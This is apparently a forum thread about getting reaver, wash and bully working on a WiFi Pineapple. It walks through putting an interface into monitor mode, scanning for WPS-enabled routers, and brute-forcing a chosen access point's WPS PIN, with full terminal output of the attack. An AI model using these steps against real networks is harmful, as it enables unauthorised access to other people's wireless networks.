SlimPickens

if I'm not using the interface I'd put it down until you're 100% comfortable with what each interface is doing.

You want the interface you are using to crack to be down. "Down" in ifconfig does not mean the hardware is disabled. The hardware is still there as wlan2, its just not running as an interface for that part of the OS. The reason you do this is so that no other part of the OS is trying to use it while you are using it for cracking. Thats why airmon-ng warns you about all those pids, one of them could interrupt your cracking by changing the settings or conditions of the hardware behind reaver. So if you want to use wlan2 for cracking, you want to: ifconfig wlan2 down airmon-ng start wlan2 (look for what mon interface number to use in the response) reaver -i *that_mon_interface_from_airmon-ng's_return* -b *mac* -vv -c *channel* But I'd start with wlan1, make sure that you have the hang of things, then move on to other hardware. You can check your work by running just ifconfig and looking at the interfaces. root@Pineapple:~# ifconfig br-lan Link encap:Ethernet HWaddr 00:13:37:A5:1E:DB inet addr:172.16.42.1 Bcast:172.16.42.255 Mask:255.255.255.0 UP BROADCAST RUNNING MULTICAST MTU:1500 Metric:1 RX packets:1127 errors:0 dropped:0 overruns:0 frame:0 TX packets:24175 errors:0 dropped:0 overruns:0 carrier:0 collisions:0 txqueuelen:0 RX bytes:86006 (83.9 KiB) TX bytes:1082632 (1.0 MiB) eth0 Link encap:Ethernet HWaddr 00:13:37:A5:1E:DB UP BROADCAST RUNNING MULTICAST MTU:1500 Metric:1 RX packets:1130 errors:0 dropped:0 overruns:0 frame:0 TX packets:24178 errors:0 dropped:0 overruns:0 carrier:0 collisions:0 txqueuelen:1000 RX bytes:102810 (100.4 KiB) TX bytes:1083838 (1.0 MiB) Interrupt:4 lo Link encap:Local Loopback inet addr:127.0.0.1 Mask:255.0.0.0 UP LOOPBACK RUNNING MTU:16436 Metric:1 RX packets:32058 errors:0 dropped:0 overruns:0 frame:0 TX packets:32058 errors:0 dropped:0 overruns:0 carrier:0 collisions:0 txqueuelen:0 RX bytes:2481231 (2.3 MiB) TX bytes:2481231 (2.3 MiB) wlan1 Link encap:Ethernet HWaddr 00:13:37:93:58:09 UP BROADCAST MULTICAST MTU:1500 Metric:1 RX packets:0 errors:0 dropped:0 overruns:0 frame:0 TX packets:0 errors:0 dropped:0 overruns:0 carrier:0 collisions:0 txqueuelen:1000 RX bytes:0 (0.0 B) TX bytes:0 (0.0 B) See wlan1 is listed? Note the MAC address. 00:13:37:93:58:09 now after ifconfig wlan1 down: root@Pineapple:~# ifconfig wlan1 down root@Pineapple:~# ifconfig br-lan Link encap:Ethernet HWaddr 00:13:37:A5:1E:DB inet addr:172.16.42.1 Bcast:172.16.42.255 Mask:255.255.255.0 UP BROADCAST RUNNING MULTICAST MTU:1500 Metric:1 RX packets:1191 errors:0 dropped:0 overruns:0 frame:0 TX packets:24254 errors:0 dropped:0 overruns:0 carrier:0 collisions:0 txqueuelen:0 RX bytes:90726 (88.5 KiB) TX bytes:1089990 (1.0 MiB) eth0 Link encap:Ethernet HWaddr 00:13:37:A5:1E:DB UP BROADCAST RUNNING MULTICAST MTU:1500 Metric:1 RX packets:1194 errors:0 dropped:0 overruns:0 frame:0 TX packets:24257 errors:0 dropped:0 overruns:0 carrier:0 collisions:0 txqueuelen:1000 RX bytes:108426 (105.8 KiB) TX bytes:1091196 (1.0 MiB) Interrupt:4 lo Link encap:Local Loopback inet addr:127.0.0.1 Mask:255.0.0.0 UP LOOPBACK RUNNING MTU:16436 Metric:1 RX packets:32114 errors:0 dropped:0 overruns:0 frame:0 TX packets:32114 errors:0 dropped:0 overruns:0 carrier:0 collisions:0 txqueuelen:0 RX bytes:2485571 (2.3 MiB) TX bytes:2485571 (2.3 MiB) Now here is what it looks like after running airmon-ng start wlan1: root@Pineapple:~# airmon-ng start wlan1 Interface Chipset Driver wlan1 RTL8187 rtl8187 - [phy1] (monitor mode enabled on mon0) wlan0 Atheros ath9k - [phy0] root@Pineapple:~# Note the "(monitor mode enabled on mon0)" and also notice that wlan0 wasn't in any of the ifconfigs but it is still in here (but we are ignoring it because wlan1/mon0 is what were after). Now ifconfig again: root@Pineapple:~# ifconfig br-lan Link encap:Ethernet HWaddr 00:13:37:A5:1E:DB inet addr:172.16.42.1 Bcast:172.16.42.255 Mask:255.255.255.0 UP BROADCAST RUNNING MULTICAST MTU:1500 Metric:1 RX packets:1272 errors:0 dropped:0 overruns:0 frame:0 TX packets:24378 errors:0 dropped:0 overruns:0 carrier:0 collisions:0 txqueuelen:0 RX bytes:96714 (94.4 KiB) TX bytes:1099694 (1.0 MiB) eth0 Link encap:Ethernet HWaddr 00:13:37:A5:1E:DB UP BROADCAST RUNNING MULTICAST MTU:1500 Metric:1 RX packets:1275 errors:0 dropped:0 overruns:0 frame:0 TX packets:24381 errors:0 dropped:0 overruns:0 carrier:0 collisions:0 txqueuelen:1000 RX bytes:115548 (112.8 KiB) TX bytes:1100900 (1.0 MiB) Interrupt:4 lo Link encap:Local Loopback inet addr:127.0.0.1 Mask:255.0.0.0 UP LOOPBACK RUNNING MTU:16436 Metric:1 RX packets:32224 errors:0 dropped:0 overruns:0 frame:0 TX packets:32224 errors:0 dropped:0 overruns:0 carrier:0 collisions:0 txqueuelen:0 RX bytes:2494087 (2.3 MiB) TX bytes:2494087 (2.3 MiB) mon0 Link encap:UNSPEC HWaddr 00-13-37-93-58-09-00-48-00-00-00-00-00-00-00-00 UP BROADCAST RUNNING MULTICAST MTU:1500 Metric:1 RX packets:0 errors:0 dropped:0 overruns:0 frame:0 TX packets:0 errors:0 dropped:0 overruns:0 carrier:0 collisions:0 txqueuelen:1000 RX bytes:0 (0.0 B) TX bytes:0 (0.0 B) root@Pineapple:~# We now have mon0. See the Mac address embedded in the HWaddr?

I think thats what I would get if the wlan0 AP interface was on the same channel as my target. Or maybe it was what I would get if I used wlan0 for the mon interface. Remember you want to use airmon-ng start wlan1 then use the mon interface it reports, if it reports more than one use airmon.ng stop monX like: airmon-ng stop mon0 until it reports only: Interface Chipset Driver wlan1 RTL8187 rtl8187 - [phy1] wlan0 Atheros ath9k - [phy0] Then airmon-ng start wlan1, and use mon0 for all "-i" with wash, reaver, and bully. Whats the signal strength reported by wash and what channel is wlan0 and your target on? Be sure that there aren't any more powerful APs on the same channel. When my main network AP is on channel 6, I have to switch it to something else before I can target any further away APs on that channel. Also there are cases that APs reported by wash just won't be attackable. But before you give up give bully a try.

Its always better to know the longhand first. You can work up from there no matter where you find yourself. ;) ..Only bad thing about that creed is there is always more longhand to learn. But man it is fun.

The biggest help was starting at the command line. The trick is to make sure you're using wlan1 as your mon interface to start off with. I also primarily use the ethernet port to connect to it while its near by. Make sure that wlan0 (default Mk.V AP interface) isn't on the same channel as the target (change it if it is) or do like me and ifconfig it down if you're not using it. You won't have any luck with any remote AP on the same channel as wlan0 is on. I plan on adding a 5Ghz AP-capable USB stick in the near future so there is no more interference (or get my LTE stick working). Command line steps (from a fresh boot up): 1. Down the wlan1 interface: ifconfig wlan1 down Return: Nothing 2. Start the mon interface: airmon-ng start wlan1 root@Pineapple:~# airmon-ng start wlan1 Interface Chipset Driver wlan1 RTL8187 rtl8187 - [phy1] (monitor mode enabled on mon0) wlan0 Atheros ath9k - [phy0] root@Pineapple:~# (If there is anything else than the above, everything you do afterwards will be flakey as all get out) 3. Look for your target router: wash -i mon0 -C I had to use -C or I'd just get bad FCS warnings and nothing else. The mon you should use is the one returned in the parentheses in the previous step "(monitor mode enabled on mon0)" root@Pineapple:~# wash -i mon0 -C Wash v1.4 WiFi Protected Setup Scan Tool Copyright © 2011, Tactical Network Solutions, Craig Heffner <cheffner@tacnetsol.com> BSSID Channel RSSI WPS Version WPS Locked ESSID -------------------------------------------------------------------------------------- 28:C6:8E:8C:90:F6 1 -73 1.0 No ####### E0:91:F5:75:CA:E2 1 -37 1.0 Yes ####### C0:C1:C0:BA:37:5F 1 -62 1.0 No ####### 7C:05:07:62:7C:C3 1 -68 1.0 No ####### C0:C1:C0:8F:E0:91 1 -66 1.0 No ####### C0:C1:C0:CC:B1:43 1 -57 1.0 No ####### 00:1C:DF:BE:43:47 6 -74 1.0 No ####### 00:1F:33:2E:D5:DE 9 -68 1.0 No ####### A0:21:B7:80:22:22 9 -71 1.0 No ####### 7C:05:07:29:EF:E7 11 -61 1.0 No ####### 00:22:75:D2:5C:7E 11 -67 1.0 No ####### 48:F8:B3:A3:15:31 11 -67 1.0 No ####### CC:B2:55:3C:F3:9C 11 -71 1.0 No ####### 0C:54:A5:54:84:6B 1 -71 1.0 No ####### ^C root@Pineapple:~# (my router is the one with the WPS Locked. I also put the ####### in there) Anything with a -65 or lower is going to be hard crack with lots of timeouts (remember these are negative numbers so -71 is lower than -65). The tiny included antennas are good for about 20-35 meters line of sight tops. 4. Get the MAC address you want and start reaver: reaver -i mon0 -vv -b E0:91:F5:75:CA:E2 -c 1 (-c is for channel, otherwise reaver(and bully) have to scan through each channel before starting. I'm impatient so I give it the clue) root@Pineapple:~# reaver -i mon0 -vv -b E0:91:F5:75:CA:E2 -c 11 Reaver v1.4 WiFi Protected Setup Attack Tool Copyright © 2011, Tactical Network Solutions, Craig Heffner <cheffner@tacnetsol.com> [+] Switching mon0 to channel 11 [?] Restore previous session for E0:91:F5:75:CA:E2? [n/Y] [+] Restored previous session [+] Waiting for beacon from E0:91:F5:75:CA:E2 [+] Associated with E0:91:F5:75:CA:E2 (ESSID: #######) [+] Trying pin 33755670 [+] Sending EAPOL START request [+] Received identity request [+] Sending identity response [+] Received M1 message [+] Sending M2 message [+] Received M3 message [+] Sending M4 message [+] Received WSC NACK [+] Sending WSC NACK [+] Trying pin 33765679 [+] Sending EAPOL START request [+] Received identity request [+] Sending identity response [+] Received M1 message [+] Sending M2 message [+] Received M3 message [+] Sending M4 message [+] Received WSC NACK [+] Sending WSC NACK [+] Trying pin 33775678 [+] Sending EAPOL START request [+] Received identity request [+] Sending identity response [+] Received M1 message ^C [+] Session saved. root@Pineapple:~# 4b. Or bully: bully -b E0:91:F5:75:CA:E2 -c 1 -S mon0 5. Is up to you. You can do the same thing on the web interface. Just disable the wlan1 interface, enable monitor mode on wlan1, then use the infusion. Or continue to use the command line with "screen" to allow you to disconnect without quitting reaver.

I have a RTL2870 based USB stick (works in kali) and RTL8188CUS based USB stick (not tried in kali). I have yet to get any of them to show up beyond an entry in lsusb until I get done with playing on the internal hardware. Also have a Pantec UML290 USB 4G modem that I know took some real fandangling to get working with my BeagleBoard xM that is waiting for its chance at ifup. That will eventually be my "way in". Thanks for the help everyone!

Yep seems to work with wlan1 (as long as the AP/router isn't set to N only it seems). I guess my dreams of doing 2 at once (or doubling up on 1) are up in smoke.

Just got my pineapple, updated to 1.3 and installed a few infusions (including WPS). I've been having trouble within the WPS GUI (waits for beacons forever) so I dropped to console to start eliminating possibles and my trouble seems to be with something other than the GUI. I have a wifi router setup as my target with WPS enabled. First I down the interface (never works with it up and even through the GUI I have to manually down it). After I start with airmon-ng: airmon-ng start wlan0 Found 1 processes that could cause trouble. If airodump-ng, aireplay-ng or airtun-ng stops working after a short period of time, you may want to kill (some of) them! PID Name 2936 root Process with PID root ( PID USER VSZ STAT COMMAND 1 root 1524 S init 2 root 0 SW [kthreadd] 3 root 0 SW [ksoftirqd/0] 5 root 0 SW [kworker/u:0] 6 root 0 SW< [khelper] 61 root 0 SW [sync_supers] 63 root 0 SW [bdi-default] 65 root 0 SW< [kblockd] 94 root 0 SW [kswapd0] 143 root 0 SW [fsnotify_mark] 155 root 0 SW< [ath79-spi] 166 root 0 SW [mtdblock0] 171 root 0 SW [mtdblock1] 176 root 0 SW [mtdblock2] 181 root 0 SW [mtdblock3] 186 root 0 SW [mtdblock4] 191 root 0 SW [mtdblock5] 232 root 0 SW [kworker/0:1] 422 root 0 SWN [jffs2_gcd_mtd3] 424 root 0 SW [flush-mtd-unmap] 448 root 0 SW [khubd] 459 root 0 SW [scsi_eh_0] 460 root 0 SW [usb-storage] 461 root 0 SW [kworker/0:2] 462 root 0 SW [kworker/u:2] 481 root 1524 S init 516 root 0 SW< [cfg80211] 558 root 0 SW< [rpciod] 568 root 0 SW< [nfsiod] 660 root 1528 S /sbin/syslogd -C16 662 root 1512 S /sbin/klogd 664 root 860 S /sbin/hotplug2 --override --persistent --set-rules-f 676 root 876 S /sbin/ubusd 745 root 1856 S {mobile-keepaliv} /bin/bash /etc/pineapple/mobile-ke 860 root 1488 S /sbin/netifd 1269 root 0 SW [jbd2/sda1-8] 1270 root 0 SW< [ext4-dio-unwrit] 1376 root 1520 S /sbin/watchdog -t 5 /dev/watchdog 1549 root 0 SW [flush-8:0] 1634 nobody 788 S /usr/sbin/atd 1642 root 1536 S /usr/sbin/crond -c /etc/crontabs -l 5 1648 root 2864 S /usr/sbin/sshd 1671 root 1136 S /usr/sbin/uhttpd -f -h /www -r Pineapple -x /cgi-bin 1677 root 1160 S /usr/sbin/uhttpd -f -h /pineapple -r Pineapple -c /e 1715 nobody 956 S /usr/sbin/dnsmasq -C /var/etc/dnsmasq.conf 1731 root 1520 S /usr/sbin/ntpd -n -p 0.openwrt.pool.ntp.org -p 1.ope 2936 root 1624 S wpa_supplicant -B -P /var/run/wifi-wlan1.pid -D nl80 2963 root 1528 S udhcpc -p /var/run/udhcpc-wlan1.pid -s /lib/netifd/d 3647 root 5488 S {sshd} sshd: root@pts/0 3660 root 1524 S -ash 3692 root 1508 S sleep 10 3702 root 1540 S {airmon-ng} /bin/sh /usr/sbin/airmon-ng start wlan0 3703 root 0 SW [kworker/u:1] 3743 root 1516 R ps -o comm= -p root) is running on interface wlan1 Process with PID root ( PID USER VSZ STAT COMMAND 1 root 1524 S init 2 root 0 SW [kthreadd] 3 root 0 SW [ksoftirqd/0] 5 root 0 SW [kworker/u:0] 6 root 0 SW< [khelper] 61 root 0 SW [sync_supers] 63 root 0 SW [bdi-default] 65 root 0 SW< [kblockd] 94 root 0 SW [kswapd0] 143 root 0 SW [fsnotify_mark] 155 root 0 SW< [ath79-spi] 166 root 0 SW [mtdblock0] 171 root 0 SW [mtdblock1] 176 root 0 SW [mtdblock2] 181 root 0 SW [mtdblock3] 186 root 0 SW [mtdblock4] 191 root 0 SW [mtdblock5] 232 root 0 SW [kworker/0:1] 422 root 0 SWN [jffs2_gcd_mtd3] 424 root 0 SW [flush-mtd-unmap] 448 root 0 SW [khubd] 459 root 0 SW [scsi_eh_0] 460 root 0 SW [usb-storage] 461 root 0 SW [kworker/0:2] 462 root 0 SW [kworker/u:2] 481 root 1524 S init 516 root 0 SW< [cfg80211] 558 root 0 SW< [rpciod] 568 root 0 SW< [nfsiod] 660 root 1528 S /sbin/syslogd -C16 662 root 1512 S /sbin/klogd 664 root 860 S /sbin/hotplug2 --override --persistent --set-rules-f 676 root 876 S /sbin/ubusd 745 root 1856 S {mobile-keepaliv} /bin/bash /etc/pineapple/mobile-ke 860 root 1488 S /sbin/netifd 1269 root 0 SW [jbd2/sda1-8] 1270 root 0 SW< [ext4-dio-unwrit] 1376 root 1520 S /sbin/watchdog -t 5 /dev/watchdog 1549 root 0 SW [flush-8:0] 1634 nobody 788 S /usr/sbin/atd 1642 root 1536 S /usr/sbin/crond -c /etc/crontabs -l 5 1648 root 2864 S /usr/sbin/sshd 1671 root 1136 S /usr/sbin/uhttpd -f -h /www -r Pineapple -x /cgi-bin 1677 root 1160 S /usr/sbin/uhttpd -f -h /pineapple -r Pineapple -c /e 1715 nobody 956 S /usr/sbin/dnsmasq -C /var/etc/dnsmasq.conf 1731 root 1520 S /usr/sbin/ntpd -n -p 0.openwrt.pool.ntp.org -p 1.ope 2936 root 1624 S wpa_supplicant -B -P /var/run/wifi-wlan1.pid -D nl80 2963 root 1528 S udhcpc -p /var/run/udhcpc-wlan1.pid -s /lib/netifd/d 3647 root 5488 S {sshd} sshd: root@pts/0 3660 root 1524 S -ash 3692 root 1508 S sleep 10 3702 root 1552 S {airmon-ng} /bin/sh /usr/sbin/airmon-ng start wlan0 3703 root 0 SW [kworker/u:1] 3744 root 1516 R ps -o comm= -p root) is running on interface wlan1 Interface Chipset Driver wlan1 RTL8187 rtl8187 - [phy1] wlan0 Atheros ath9k - [phy0] (monitor mode enabled on mon0) Many other things seem to work on mon0. When I run reaver, its failing badly: root@Pineapple:~# reaver -i mon0 -b C0:C1:C0:8F:E0:91 -c 6 -vv Reaver v1.4 WiFi Protected Setup Attack Tool Copyright © 2011, Tactical Network Solutions, Craig Heffner <cheffner@tacnetsol.com> [+] Switching mon0 to channel 6 [+] Waiting for beacon from C0:C1:C0:8F:E0:91 [+] Associated with C0:C1:C0:8F:E0:91 (ESSID: SPickens) [+] Trying pin 12345670 [+] Sending EAPOL START request [+] Received identity request [+] Sending identity response [+] Received identity request [+] Sending identity response [+] Received identity request [+] Sending identity response [!] WARNING: Receive timeout occurred [+] Sending WSC NACK [!] WPS transaction failed (code: 0x02), re-trying last pin [+] Trying pin 12345670 [+] Sending EAPOL START request [+] Received identity request [+] Sending identity response [+] Received M1 message [+] Sending M2 message [+] Received M1 message [+] Sending WSC NACK [+] Sending WSC NACK [!] WPS transaction failed (code: 0x03), re-trying last pin [+] Trying pin 12345670 [+] Sending EAPOL START request [+] Received identity request [+] Sending identity response [+] Received identity request [+] Sending identity response [+] Received identity request [+] Sending identity response [!] WARNING: Receive timeout occurred [+] Sending WSC NACK [!] WPS transaction failed (code: 0x02), re-trying last pin [+] Trying pin 12345670 [+] Sending EAPOL START request [+] Received identity request [+] Sending identity response [+] Received identity request [+] Sending identity response [+] Received identity request [+] Sending identity response [+] Received identity request [+] Sending identity response [+] Received identity request [+] Sending identity response [+] Received identity request [+] Sending identity response ^C [+] Nothing done, nothing to save. It will just do that forever if I'd let it. Sometimes, like 1 in 100, it will make it to M3/4 but still fails. The pineapple and the target router are separated by about 18-20 feet. I have no trouble with brute forcing this router with a crumby USB wifi stick and kali in a VMware session except the occasional dropping of the mon0 interface, but it shows no WPS transactions failing until it abruptly stops with the mon0 interface. I have yet to get a single successful WPS transaction... What am I missing?